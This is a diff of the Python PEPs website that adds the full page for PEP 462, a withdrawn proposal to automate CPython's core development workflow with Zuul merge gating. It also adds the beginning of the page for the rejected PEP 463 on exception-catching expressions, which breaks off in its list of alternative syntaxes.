+
+
+

PEP 462 – Core development workflow automation for CPython

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Process
+
Requires:
+
474
+
Created:
+
23-Jan-2014
+
Post-History:
+
25-Jan-2014, 27-Jan-2014, 01-Feb-2015
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes investing in automation of several of the tedious, +time-consuming activities that are currently required for the core development +team to incorporate changes into CPython. This proposal is intended to +allow core developers to make more effective use of the time they have +available to contribute to CPython, which should also result in an improved +experience for other contributors that are reliant on the core team to get +their changes incorporated.

+
+
+

PEP Withdrawal

+

This PEP has been withdrawn by the author +in favour of the GitLab based proposal in PEP 507.

+

If anyone else would like to take over championing this PEP, contact the +core-workflow mailing list

+
+
+

Rationale for changes to the core development workflow

+

The current core developer workflow to merge a new feature into CPython +on a POSIX system “works” as follows:

+
    +
  1. If applying a change submitted to bugs.python.org by another user, first +check they have signed the PSF Contributor Licensing Agreement. If not, +request that they sign one before continuing with merging the change.
  2. +
  3. Apply the change locally to a current checkout of the main CPython +repository (the change will typically have been discussed and reviewed +as a patch on bugs.python.org first, but this step is not currently +considered mandatory for changes originating directly from core +developers).
  4. +
  5. Run the test suite locally, at least make test or +./python -m test (depending on system specs, this takes a few +minutes in the default configuration, but substantially longer if all +optional resources, like external network access, are enabled).
  6. +
  7. Run make patchcheck to fix any whitespace issues and as a reminder +of other changes that may be needed (such as updating Misc/ACKS or +adding an entry to Misc/NEWS)
  8. +
  9. Commit the change and push it to the main repository. If hg indicates +this would create a new head in the remote repository, run +hg pull --rebase (or an equivalent). Theoretically, you should +rerun the tests at this point, but it’s very tempting to skip that +step.
  10. +
  11. After pushing, monitor the stable buildbots +for any new failures introduced by your change. In particular, developers +on POSIX systems will often break the Windows buildbots, and vice-versa. +Less commonly, developers on Linux or Mac OS X may break other POSIX +systems.
  12. +
+

The steps required on Windows are similar, but the exact commands used +will be different.

+

Rather than being simpler, the workflow for a bug fix is more complicated +than that for a new feature! New features have the advantage of only being +applied to the default branch, while bug fixes also need to be considered +for inclusion in maintenance branches.

+
    +
  • If a bug fix is applicable to Python 2.7, then it is also separately +applied to the 2.7 branch, which is maintained as an independent head +in Mercurial
  • +
  • If a bug fix is applicable to the current 3.x maintenance release, then +it is first applied to the maintenance branch and then merged forward +to the default branch. Both branches are pushed to hg.python.org at the +same time.
  • +
+

Documentation patches are simpler than functional patches, but not +hugely so - the main benefit is only needing to check the docs build +successfully rather than running the test suite.

+

I would estimate that even when everything goes smoothly, it would still +take me at least 20-30 minutes to commit a bug fix patch that applies +cleanly. Given that it should be possible to automate several of these +tasks, I do not believe our current practices are making effective use +of scarce core developer resources.

+

There are many, many frustrations involved with this current workflow, and +they lead directly to some undesirable development practices.

+
    +
  • Much of this overhead is incurred on a per-patch applied basis. This +encourages large commits, rather than small isolated changes. The time +required to commit a 500 line feature is essentially the same as that +needed to commit a 1 line bug fix - the additional time needed for the +larger change appears in any preceding review rather than as part of the +commit process.
  • +
  • The additional overhead of working on applying bug fixes creates an +additional incentive to work on new features instead, and new features +are already inherently more interesting to work on - they don’t need +workflow difficulties giving them a helping hand!
  • +
  • Getting a preceding review on bugs.python.org is additional work, +creating an incentive to commit changes directly, increasing the reliance +on post-review on the python-checkins mailing list.
  • +
  • Patches on the tracker that are complete, correct and ready to merge may +still languish for extended periods awaiting a core developer with the +time to devote to getting it merged.
  • +
  • The risk of push races (especially when pushing a merged bug fix) creates +a temptation to skip doing full local test runs (especially after a push +race has already been encountered once), increasing the chance of +breaking the buildbots.
  • +
  • The buildbots are sometimes red for extended periods, introducing errors +into local test runs, and also meaning that they sometimes fail to serve +as a reliable indicator of whether or not a patch has introduced cross +platform issues.
  • +
  • Post-conference development sprints are a nightmare, as they collapse +into a mire of push races. It’s tempting to just leave patches on the +tracker until after the sprint is over and then try to clean them up +afterwards.
  • +
+

There are also many, many opportunities for core developers to make +mistakes that inconvenience others, both in managing the Mercurial branches +and in breaking the buildbots without being in a position to fix them +promptly. This both makes the existing core development team cautious in +granting new developers commit access, as well as making those new +developers cautious about actually making use of their increased level of +access.

+

There are also some incidental annoyances (like keeping the NEWS file up to +date) that will also be necessarily addressed as part of this proposal.

+

One of the most critical resources of a volunteer-driven open source project +is the emotional energy of its contributors. The current approach to change +incorporation doesn’t score well on that front for anyone:

+
    +
  • For core developers, the branch wrangling for bug fixes is delicate and +easy to get wrong. Conflicts on the NEWS file and push races when +attempting to upload changes add to the irritation of something most of +us aren’t being paid to spend time on (and for those that are, contributing +to CPython is likely to be only one of our responsibilities). The time we +spend actually getting a change merged is time we’re not spending coding +additional changes, writing or updating documentation or reviewing +contributions from others.
  • +
  • Red buildbots make life difficult for other developers (since a local +test failure may not be due to anything that developer did), release +managers (since they may need to enlist assistance cleaning up test +failures prior to a release) and for the developers themselves (since +it creates significant pressure to fix any failures we inadvertently +introduce right now, rather than at a more convenient time, as well +as potentially making hg bisect more difficult to use if +hg annotate isn’t sufficient to identify the source of a new failure).
  • +
  • For other contributors, a core developer spending time actually getting +changes merged is a developer that isn’t reviewing and discussing patches +on the issue tracker or otherwise helping others to contribute effectively. +It is especially frustrating for contributors that are accustomed to the +simplicity of a developer just being able to hit “Merge” on a pull +request that has already been automatically tested in the project’s CI +system (which is a common workflow on sites like GitHub and BitBucket), or +where the post-review part of the merge process is fully automated (as is +the case for OpenStack).
  • +
+
+
+

Current Tools

+

The following tools are currently used to manage various parts of the +CPython core development workflow.

+
    +
  • Mercurial (hg.python.org) for version control
  • +
  • Roundup (bugs.python.org) for issue tracking
  • +
  • Rietveld (also hosted on bugs.python.org) for code review
  • +
  • Buildbot (buildbot.python.org) for automated testing
  • +
+

This proposal suggests replacing the use of Rietveld for code review with +the more full-featured Kallithea-based forge.python.org service proposed in +PEP 474. Guido has indicated that the original Rietveld implementation was +primarily intended as a public demonstration application for Google App +Engine, and switching to Kallithea will address some of the issues with +identifying intended target branches that arise when working with patch files +on Roundup and the associated reviews in the integrated Rietveld instance.

+

It also suggests the addition of new tools in order to automate +additional parts of the workflow, as well as a critical review of the +remaining tools to see which, if any, may be candidates for replacement.

+
+
+

Proposal

+

The essence of this proposal is that CPython aim to adopt a “core reviewer” +development model, similar to that used by the OpenStack project.

+

The workflow problems experienced by the CPython core development team are +not unique. The OpenStack infrastructure team have come up with a well +designed automated workflow that is designed to ensure:

+
    +
  • once a patch has been reviewed, further developer involvement is needed +only if the automated tests fail prior to merging
  • +
  • patches never get merged without being tested relative to the current +state of the branch
  • +
  • the main development branch always stays green. Patches that do not pass +the automated tests do not get merged
  • +
+

If a core developer wants to tweak a patch prior to merging, they download +it from the review tool, modify and upload it back to the review tool +rather than pushing it directly to the source code repository.

+

The core of this workflow is implemented using a tool called Zuul, a +Python web service created specifically for the OpenStack project, but +deliberately designed with a plugin based trigger and action system to make +it easier to adapt to alternate code review systems, issue trackers and +CI systems. James Blair of the OpenStack infrastructure team provided +an excellent overview of Zuul at linux.conf.au 2014.

+

While Zuul handles several workflows for OpenStack, the specific one of +interest for this PEP is the “merge gating” workflow.

+

For this workflow, Zuul is configured to monitor the Gerrit code review +system for patches which have been marked as “Approved”. Once it sees +such a patch, Zuul takes it, and combines it into a queue of “candidate +merges”. It then creates a pipeline of test runs that execute in parallel in +Jenkins (in order to allow more than 24 commits a day when a full test run +takes the better part of an hour), and are merged as they pass (and as all +the candidate merges ahead of them in the queue pass). If a patch fails the +tests, Zuul takes it out of the queue, cancels any test runs after that patch in +the queue, and rebuilds the queue without the failing patch.

+

If a developer looks at a test which failed on merge and determines that it +was due to an intermittent failure, they can then resubmit the patch for +another attempt at merging.

+

To adapt this process to CPython, it should be feasible to have Zuul monitor +Kallithea for approved pull requests (which may require a feature addition in +Kallithea), submit them to Buildbot for testing on the stable buildbots, and +then merge the changes appropriately in Mercurial. This idea poses a few +technical challenges, which have their own section below.

+

For CPython, I don’t believe we will need to take advantage of Zuul’s +ability to execute tests in parallel (certainly not in the initial +iteration - if we get to a point where serial testing of patches by the +merge gating system is our primary bottleneck rather than having the +people we need in order to be able to review and approve patches, then +that will be a very good day).

+

However, the merge queue itself is a very powerful concept that should +directly address several of the issues described in the Rationale above.

+
+
+

Deferred Proposals

+

The OpenStack team also use Zuul to coordinate several other activities:

+
    +
  • Running preliminary “check” tests against patches posted to Gerrit.
  • +
  • Creation of updated release artefacts and republishing documentation when +changes are merged
  • +
  • The Elastic recheck feature that uses ElasticSearch in conjunction with +a spam filter to monitor test output and suggest the specific intermittent +failure that may have caused a test to fail, rather than requiring users +to search logs manually
  • +
+

While these are possibilities worth exploring in the future (and one of the +possible benefits I see to seeking closer coordination with the OpenStack +Infrastructure team), I don’t see them as offering quite the same kind of +fundamental workflow improvement that merge gating appears to provide.

+

However, if we find we are having too many problems with intermittent test +failures in the gate, then introducing the “Elastic recheck” feature may +need to be considered as part of the initial deployment.

+
+
+

Suggested Variants

+

Terry Reedy has suggested doing an initial filter which specifically looks +for approved documentation-only patches (~700 of the 4000+ open CPython +issues are pure documentation updates). This approach would avoid several +of the issues related to flaky tests and cross-platform testing, while +still allowing the rest of the automation flows to be worked out (such as +how to push a patch into the merge queue).

+

The key downside to this approach is that Zuul wouldn’t have complete +control of the merge process as it usually expects, so there would +potentially be additional coordination needed around that.

+

It may be worth keeping this approach as a fallback option if the initial +deployment proves to have more trouble with test reliability than is +anticipated.

+

It would also be possible to tweak the merge gating criteria such that it +doesn’t run the test suite if it detects that the patch hasn’t modified any +files outside the “Docs” tree, and instead only checks that the documentation +builds without errors.

+

As yet another alternative, it may be reasonable to move some parts of the +documentation (such as the tutorial and the HOWTO guides) out of the main +source repository and manage them using the simpler pull request based model +described in PEP 474.

+
+
+

Perceived Benefits

+

The benefits of this proposal accrue most directly to the core development +team. First and foremost, it means that once we mark a patch as “Approved” +in the updated code review system, we’re usually done. The extra 20-30 +minutes (or more) of actually applying the patch, running the tests and +merging it into Mercurial would all be orchestrated by Zuul. Push races +would also be a thing of the past - if lots of core developers are +approving patches at a sprint, then that just means the queue gets +deeper in Zuul, rather than developers getting frustrated trying to +merge changes and failing. Test failures would still happen, but they +would result in the affected patch being removed from the merge queue, +rather than breaking the code in the main repository.

+

With the bulk of the time investment moved to the review process, this +also encourages “development for reviewability” - smaller, easier to review +patches, since the overhead of running the tests multiple times will be +incurred by Zuul rather than by the core developers.

+

However, removing this time sink from the core development team should also +improve the experience of CPython development for other contributors, as it +eliminates several of the opportunities for patches to get “dropped on the +floor”, as well as increasing the time core developers are likely to have +available for reviewing contributed patches.

+

Another example of benefits to other contributors is that when a sprint +aimed primarily at new contributors is running with just a single core +developer present (such as the sprints at PyCon AU for the last +few years), the merge queue would allow that developer to focus more of +their time on reviewing patches and helping the other contributors at the +sprint, since accepting a patch for inclusion would now be a single click +in the Kallithea UI, rather than the relatively time-consuming process that +it is currently. Even when multiple core developers are present, it is +better to enable them to spend their time and effort on interacting with +the other sprint participants than it is on things that are sufficiently +mechanical that a computer can (and should) handle them.

+

With most of the ways to make a mistake when committing a change +automated out of existence, there are also substantially fewer new things to +learn when a contributor is nominated to become a core developer. This +should have a dual benefit, both in making the existing core developers more +comfortable with granting that additional level of responsibility, and in +making new contributors more comfortable with exercising it.

+

Finally, a more stable default branch in CPython makes it easier for +other Python projects to conduct continuous integration directly against the +main repo, rather than having to wait until we get into the release +candidate phase of a new release. At the moment, setting up such a system +isn’t particularly attractive, as it would need to include an additional +mechanism to wait until CPython’s own Buildbot fleet indicated that the +build was in a usable state. With the proposed merge gating system, the +trunk always remains usable.

+
+
+

Technical Challenges

+

Adapting Zuul from the OpenStack infrastructure to the CPython +infrastructure will at least require the development of additional +Zuul trigger and action plugins, and may require additional development +in some of our existing tools.

+
+

Kallithea vs Gerrit

+

Kallithea does not currently include a voting/approval feature that is +equivalent to Gerrit’s. For CPython, we wouldn’t need anything as +sophisticated as Gerrit’s voting system - a simple core-developer-only +“Approved” marker to trigger action from Zuul should suffice. The +core-developer-or-not flag is available in Roundup, as is the flag +indicating whether or not the uploader of a patch has signed a PSF +Contributor Licensing Agreement, which may require further development to +link contributor accounts between the Kallithea instance and Roundup.

+

Some of the existing Zuul triggers work by monitoring for particular comments +(in particular, recheck/reverify comments to ask Zuul to try merging a +change again if it was previously rejected due to an unrelated intermittent +failure). We will likely also want similar explicit triggers for Kallithea.

+

The current Zuul plugins for Gerrit work by monitoring the Gerrit activity +stream for particular events. If Kallithea has no equivalent, we will need +to add something suitable for the events we would like to trigger on.

+

There would also be development effort needed to create a Zuul plugin +that monitors Kallithea activity rather than Gerrit.

+
+
+

Mercurial vs Gerrit/git

+

Gerrit uses git as the actual storage mechanism for patches, and +automatically handles merging of approved patches. By contrast, Kallithea +use the RhodeCode created vcs library as +an abstraction layer over specific DVCS implementations (with Mercurial and +git backends currently available).

+

Zuul is also directly integrated with git for patch manipulation - as far +as I am aware, this part of the design currently isn’t pluggable. However, +at PyCon US 2014, the Mercurial core developers at the sprints expressed +some interest in collaborating with the core development team and the Zuul +developers on enabling the use of Zuul with Mercurial in addition to git. +As Zuul is itself a Python application, migrating it to use the same DVCS +abstraction library as RhodeCode and Kallithea may be a viable path towards +achieving that.

+
+
+

Buildbot vs Jenkins

+

Zuul’s interaction with the CI system is also pluggable, using Gearman +as the preferred interface. +Accordingly, adapting the CI jobs to run in Buildbot rather than Jenkins +should just be a matter of writing a Gearman client that can process the +requests from Zuul and pass them on to the Buildbot master. Zuul uses the +pure Python gear client library to +communicate with Gearman, and this library should also be useful to handle +the Buildbot side of things.

+

Note that, in the initial iteration, I am proposing that we do not +attempt to pipeline test execution. This means Zuul would be running in +a very simple mode where only the patch at the head of the merge queue +is being tested on the Buildbot fleet, rather than potentially testing +several patches in parallel. I am picturing something equivalent to +requesting a forced build from the Buildbot master, and then waiting for +the result to come back before moving on to the second patch in the queue.

+

If we ultimately decide that this is not sufficient, and we need to start +using the CI pipelining features of Zuul, then we may need to look at moving +the test execution to dynamically provisioned cloud images, rather than +relying on volunteer maintained statically provisioned systems as we do +currently. The OpenStack CI infrastructure team are exploring the idea of +replacing their current use of Jenkins masters with a simpler pure Python +test runner, so if we find that we can’t get Buildbot to effectively +support the pipelined testing model, we’d likely participate in that +effort rather than setting up a Jenkins instance for CPython.

+

In this case, the main technical risk would be a matter of ensuring we +support testing on platforms other than Linux (as our stable buildbots +currently cover Windows, Mac OS X, FreeBSD and OpenIndiana in addition to a +couple of different Linux variants).

+

In such a scenario, the Buildbot fleet would still have a place in doing +“check” runs against the master repository (either periodically or for +every commit), even if it did not play a part in the merge gating process. +More unusual configurations (such as building without threads, or without +SSL/TLS support) would likely still be handled that way rather than being +included in the gate criteria (at least initially, anyway).

+
+
+

Handling of maintenance branches

+

The OpenStack project largely leaves the question of maintenance branches +to downstream vendors, rather than handling it directly. This means there +are questions to be answered regarding how we adapt Zuul to handle our +maintenance branches.

+

Python 2.7 can be handled easily enough by treating it as a separate patch +queue. This would be handled natively in Kallithea by submitting separate +pull requests in order to update the Python 2.7 maintenance branch.

+

The Python 3.x maintenance branches are potentially more complicated. My +current recommendation is to simply stop using Mercurial merges to manage +them, and instead treat them as independent heads, similar to the Python +2.7 branch. Separate pull requests would need to be submitted for the active +Python 3 maintenance branch and the default development branch. The +downside of this approach is that it increases the risk that a fix is merged +only to the maintenance branch without also being submitted to the default +branch, so we may want to design some additional tooling that ensures that +every maintenance branch pull request either has a corresponding default +branch pull request prior to being merged, or else has an explicit disclaimer +indicating that it is only applicable to that branch and doesn’t need to be +ported forward to later branches.

+

Such an approach has the benefit of adjusting relatively cleanly to the +intermittent periods where we have two active Python 3 maintenance branches.

+

This issue does suggest some potential user interface ideas for Kallithea, +where it may be desirable to be able to clone a pull request in order to be +able to apply it to a second branch.

+
+
+

Handling of security branches

+

For simplicity’s sake, I would suggest leaving the handling of +security-fix only branches alone: the release managers for those branches +would continue to backport specific changes manually. The only change is +that they would be able to use the Kallithea pull request workflow to do the +backports if they would like others to review the updates prior to merging +them.

+
+
+

Handling of NEWS file updates

+

Our current approach to handling NEWS file updates regularly results in +spurious conflicts when merging bug fixes forward from an active maintenance +branch to a later branch.

+

Issue #18967* discusses some +possible improvements in that area, which would be beneficial regardless +of whether or not we adopt Zuul as a workflow automation tool.

+
+
+

Stability of “stable” Buildbot slaves

+

Instability of the nominally stable buildbots has a substantially larger +impact under this proposal. We would need to ensure we’re genuinely happy +with each of those systems gating merges to the development branches, or +else move then to “unstable” status.

+
+
+

Intermittent test failures

+

Some tests, especially timing tests, exhibit intermittent failures on the +existing Buildbot fleet. In particular, test systems running as VMs may +sometimes exhibit timing failures when the VM host is under higher than +normal load.

+

The OpenStack CI infrastructure includes a number of additional features to +help deal with intermittent failures, the most basic of which is simply +allowing developers to request that merging a patch be tried again when the +original failure appears to be due to a known intermittent failure (whether +that intermittent failure is in OpenStack itself or just in a flaky test).

+

The more sophisticated Elastic recheck feature may be worth considering, +especially since the output of the CPython test suite is substantially +simpler than that from OpenStack’s more complex multi-service testing, and +hence likely even more amenable to automated analysis.

+
+
+

Custom Mercurial client workflow support

+

One useful part of the OpenStack workflow is the “git review” plugin, +which makes it relatively easy to push a branch from a local git clone up +to Gerrit for review.

+

PEP 474 mentions a draft custom Mercurial +extension +that automates some aspects of the existing CPython core development workflow.

+

As part of this proposal, that custom extension would be extended to work +with the new Kallithea based review workflow in addition to the legacy +Roundup/Rietveld based review workflow.

+
+
+
+

Social Challenges

+

The primary social challenge here is getting the core development team to +change their practices. However, the tedious-but-necessary steps that are +automated by the proposal should create a strong incentive for the +existing developers to go along with the idea.

+

I believe three specific features may be needed to assure existing +developers that there are no downsides to the automation of this workflow:

+
    +
  • Only requiring approval from a single core developer to incorporate a +patch. This could be revisited in the future, but we should preserve the +status quo for the initial rollout.
  • +
  • Explicitly stating that core developers remain free to approve their own +patches, except during the release candidate phase of a release. This +could be revisited in the future, but we should preserve the status quo +for the initial rollout.
  • +
  • Ensuring that at least release managers have a “merge it now” capability +that allows them to force a particular patch to the head of the merge +queue. Using a separate clone for release preparation may be sufficient +for this purpose. Longer term, automatic merge gating may also allow for +more automated preparation of release artefacts as well.
  • +
+
+
+

Practical Challenges

+

The PSF runs its own directly and indirectly sponsored workflow +infrastructure primarily due to past experience with unacceptably poor +performance and inflexibility of infrastructure provided for free to the +general public. CPython development was originally hosted on SourceForge, +with source control moved to self hosting when SF was both slow to offer +Subversion support and suffering from CVS performance issues (see PEP 347), +while issue tracking later moved to the open source Roundup issue tracker +on dedicated sponsored hosting (from Upfront Systems), due to a combination +of both SF performance issues and general usability issues with the SF +tracker at the time (the outcome and process for the new tracker selection +were captured on the python.org wiki rather than in a PEP).

+

Accordingly, proposals that involve setting ourselves up for “SourceForge +usability and reliability issues, round two” will face significant +opposition from at least some members of the CPython core development team +(including the author of this PEP). This proposal respects that history by +recommending only tools that are available for self-hosting as sponsored +or PSF funded infrastructure, and are also open source Python projects that +can be customised to meet the needs of the CPython core development team.

+

However, for this proposal to be a success (if it is accepted), we need to +understand how we are going to carry out the necessary configuration, +customisation, integration and deployment work.

+

The last attempt at adding a new piece to the CPython support infrastructure +(speed.python.org) has unfortunately foundered due to the lack of time to +drive the project from the core developers and PSF board members involved, +and the difficulties of trying to bring someone else up to speed to lead +the activity (the hardware donated to that project by HP is currently in +use to support PyPy instead, but the situation highlights some +of the challenges of relying on volunteer labour with many other higher +priority demands on their time to steer projects to completion).

+

Even ultimately successful past projects, such as the source control +migrations from CVS to Subversion and from Subversion to Mercurial, the +issue tracker migration from SourceForge to Roundup, the code review +integration between Roundup and Rietveld and the introduction of the +Buildbot continuous integration fleet, have taken an extended period of +time as volunteers worked their way through the many technical and social +challenges involved.

+

Fortunately, as several aspects of this proposal and PEP 474 align with +various workflow improvements under consideration for Red Hat’s +Beaker open source hardware integration +testing system and other work-related projects, I have arranged to be able +to devote ~1 day a week to working on CPython infrastructure projects.

+

Together with Rackspace’s existing contributions to maintaining the +pypi.python.org infrastructure, I personally believe this arrangement is +indicative of a more general recognition amongst CPython redistributors and +major users of the merit in helping to sustain upstream infrastructure +through direct contributions of developer time, rather than expecting +volunteer contributors to maintain that infrastructure entirely in their +spare time or funding it indirectly through the PSF (with the additional +management overhead that would entail). I consider this a positive trend, and +one that I will continue to encourage as best I can.

+
+
+

Open Questions

+

Pretty much everything in the PEP. Do we want to adopt merge gating and +Zuul? How do we want to address the various technical challenges? +Are the Kallithea and Zuul development communities open to the kind +of collaboration that would be needed to make this effort a success?

+

While I’ve arranged to spend some of my own work time on this, do we want to +approach the OpenStack Foundation for additional assistance, since +we’re a key dependency of OpenStack itself, Zuul is a creation of the +OpenStack infrastructure team, and the available development resources for +OpenStack currently dwarf those for CPython?

+

Are other interested folks working for Python redistributors and major users +also in a position to make a business case to their superiors for investing +developer time in supporting this effort?

+
+
+

Next Steps

+

If pursued, this will be a follow-on project to the Kallithea-based +forge.python.org proposal in PEP 474. Refer to that PEP for more details +on the discussion, review and proof-of-concept pilot process currently +under way.

+
+
+

Acknowledgements

+

Thanks to Jesse Noller, Alex Gaynor and James Blair for providing valuable +feedback on a preliminary draft of this proposal, and to James and Monty +Taylor for additional technical feedback following publication of the +initial draft.

+

Thanks to Bradley Kuhn, Mads Kiellerich and other Kallithea developers for +the discussions around PEP 474 that led to a significant revision of this +proposal to be based on using Kallithea for the review component rather than +the existing Rietveld installation.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0462.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0463/index.html b/pep-0463/index.html new file mode 100644 index 00000000000..fa52dd3c643 --- /dev/null +++ b/pep-0463/index.html @@ -0,0 +1,980 @@ + + + + + + + + PEP 463 – Exception-catching expressions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 463 – Exception-catching expressions

+
+
Author:
+
Chris Angelico <rosuav at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
15-Feb-2014
+
Python-Version:
+
3.5
+
Post-History:
+
20-Feb-2014, 16-Feb-2014
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

From https://mail.python.org/pipermail/python-dev/2014-March/133118.html:

+

“”” +I want to reject this PEP. I think the proposed syntax is acceptable given +the desired semantics, although it’s still a bit jarring. It’s probably no +worse than the colon used with lambda (which echoes the colon used in a def +just like the colon here echoes the one in a try/except) and definitely +better than the alternatives listed.

+

But the thing I can’t get behind are the motivation and rationale. I don’t +think that e.g. dict.get() would be unnecessary once we have except +expressions, and I disagree with the position that EAFP is better than +LBYL, or “generally recommended” by Python. (Where do you get that? From +the same sources that are so obsessed with DRY they’d rather introduce a +higher-order-function than repeat one line of code? :-)

+

This is probably the most you can get out of me as far as a pronouncement. +Given that the language summit is coming up I’d be happy to dive deeper in +my reasons for rejecting it there (if there’s demand).

+

I do think that (apart from never explaining those dreadful acronyms :-) +this was a well-written and well-researched PEP, and I think you’ve done a +great job moderating the discussion, collecting objections, reviewing +alternatives, and everything else that is required to turn a heated debate +into a PEP. Well done Chris (and everyone who helped), and good luck with +your next PEP! +“””

+
+
+

Abstract

+

Just as PEP 308 introduced a means of value-based conditions in an +expression, this system allows exception-based conditions to be used +as part of an expression.

+
+
+

Motivation

+

A number of functions and methods have parameters which will cause +them to return a specified value instead of raising an exception. The +current system is ad-hoc and inconsistent, and requires that each +function be individually written to have this functionality; not all +support this.

+
    +
  • dict.get(key, default) - second positional argument in place of +KeyError
  • +
  • next(iter, default) - second positional argument in place of +StopIteration
  • +
  • list.pop() - no way to return a default
  • +
  • seq[index] - no way to handle a bounds error
  • +
  • min(sequence, default=default) - keyword argument in place of +ValueError
  • +
  • statistics.mean(data) - no way to handle an empty iterator
  • +
+

Had this facility existed early in Python’s history, there would have been +no need to create dict.get() and related methods; the one obvious way to +handle an absent key would be to respond to the exception. One method is +written which signals the absence in one way, and one consistent technique +is used to respond to the absence. Instead, we have dict.get(), and as of +Python 3.4, we also have min(… default=default), and myriad others. We +have a LBYL syntax for testing inside an expression, but there is currently +no EAFP notation; compare the following:

+
# LBYL:
+if key in dic:
+    process(dic[key])
+else:
+    process(None)
+# As an expression:
+process(dic[key] if key in dic else None)
+
+# EAFP:
+try:
+    process(dic[key])
+except KeyError:
+    process(None)
+# As an expression:
+process(dic[key] except KeyError: None)
+
+
+

Python generally recommends the EAFP policy, but must then proliferate +utility functions like dic.get(key,None) to enable this.

+
+
+

Rationale

+

The current system requires that a function author predict the need +for a default, and implement support for it. If this is not done, a +full try/except block is needed.

+

Since try/except is a statement, it is impossible to catch exceptions +in the middle of an expression. Just as if/else does for conditionals +and lambda does for function definitions, so does this allow exception +catching in an expression context.

+

This provides a clean and consistent way for a function to provide a +default: it simply raises an appropriate exception, and the caller +catches it.

+

With some situations, an LBYL technique can be used (checking if some +sequence has enough length before indexing into it, for instance). This is +not safe in all cases, but as it is often convenient, programmers will be +tempted to sacrifice the safety of EAFP in favour of the notational brevity +of LBYL. Additionally, some LBYL techniques (eg involving getattr with +three arguments) warp the code into looking like literal strings rather +than attribute lookup, which can impact readability. A convenient EAFP +notation solves all of this.

+

There’s no convenient way to write a helper function to do this; the +nearest is something ugly using either lambda:

+
def except_(expression, exception_list, default):
+    try:
+        return expression()
+    except exception_list:
+        return default()
+value = except_(lambda: 1/x, ZeroDivisionError, lambda: float("nan"))
+
+
+

which is clunky, and unable to handle multiple exception clauses; or +eval:

+
def except_(expression, exception_list, default):
+    try:
+        return eval(expression, globals_of_caller(), locals_of_caller())
+    except exception_list as exc:
+        l = locals_of_caller().copy()
+        l['exc'] = exc
+        return eval(default, globals_of_caller(), l)
+
+def globals_of_caller():
+    return sys._getframe(2).f_globals
+
+def locals_of_caller():
+    return sys._getframe(2).f_locals
+
+value = except_("""1/x""",ZeroDivisionError,""" "Can't divide by zero" """)
+
+
+

which is even clunkier, and relies on implementation-dependent hacks. +(Writing globals_of_caller() and locals_of_caller() for interpreters +other than CPython is left as an exercise for the reader.)

+

Raymond Hettinger expresses a desire for such a consistent +API. Something similar has been requested multiple times +in the past.

+
+
+

Proposal

+

Just as the ‘or’ operator and the three part ‘if-else’ expression give +short circuiting methods of catching a falsy value and replacing it, +this syntax gives a short-circuiting method of catching an exception +and replacing it.

+

This currently works:

+
lst = [1, 2, None, 3]
+value = lst[2] or "No value"
+
+
+

The proposal adds this:

+
lst = [1, 2]
+value = (lst[2] except IndexError: "No value")
+
+
+

Specifically, the syntax proposed is:

+
(expr except exception_list: default)
+
+
+

where expr, exception_list, and default are all expressions. First, +expr is evaluated. If no exception is raised, its value is the value +of the overall expression. If any exception is raised, exception_list +is evaluated, and should result in either a type or a tuple, just as +with the statement form of try/except. Any matching exception will +result in the corresponding default expression being evaluated and +becoming the value of the expression. As with the statement form of +try/except, non-matching exceptions will propagate upward.

+

Parentheses are required around the entire expression, unless they +would be completely redundant, according to the same rules as generator +expressions follow. This guarantees correct interpretation of nested +except-expressions, and allows for future expansion of the syntax - +see below on multiple except clauses.

+

Note that the current proposal does not allow the exception object to +be captured. Where this is needed, the statement form must be used. +(See below for discussion and elaboration on this.)

+

This ternary operator would be between lambda and if/else in +precedence.

+

Consider this example of a two-level cache:

+
for key in sequence:
+    x = (lvl1[key] except KeyError: (lvl2[key] except KeyError: f(key)))
+    # do something with x
+
+
+

This cannot be rewritten as:

+
x = lvl1.get(key, lvl2.get(key, f(key)))
+
+
+

which, despite being shorter, defeats the purpose of the cache, as it must +calculate a default value to pass to get(). The .get() version calculates +backwards; the exception-testing version calculates forwards, as would be +expected. The nearest useful equivalent would be:

+
x = lvl1.get(key) or lvl2.get(key) or f(key)
+
+
+

which depends on the values being nonzero, as well as depending on the cache +object supporting this functionality.

+
+
+

Alternative Proposals

+

Discussion on python-ideas brought up the following syntax suggestions:

+
value = expr except default if Exception [as e]
+value = expr except default for Exception [as e]
+value = expr except default from Exception [as e]
+value = expr except Exception [as e] return default
+value = expr except (Exception [as e]: default)
+value = expr except Exception [as e] try default
+value = expr except Exception [as e] continue with default
+value = default except Exception [as e] else expr
+value = try expr except Exception [as e]: default
+value = expr except default # Catches anything
+value = expr except(Exception) default # Catches only the named type(s)
+value = default if expr raise Exception
+value = expr or else default if Exception
+value = expr except Exception [as e] -> default
+value = expr except Exception [as e] pass default
+
+
+

It has also been suggested that a new keyword be created, rather than +reusing an existing one. Such proposals fall into the same structure +as the last form, but with a different keyword in place of ‘pass’. +Suggestions include ‘then’, ‘when’, and ‘use’. Also, in the context of +the “default if expr raise Exception” proposal, it was suggested that a +new keyword “raises” be used.

+

All forms involving the ‘as’ capturing clause have been deferred from +this proposal in the interests of simplicity, but are preserved in the +table above as an accurate record of suggestions.

+

The four forms most supported by this proposal are, in order:

+
value = (expr except Exception: default)
+value = (expr except Exception -> default)
+value = (expr except Exception pass default)
+value = (expr except Exception then default)
+
+
+

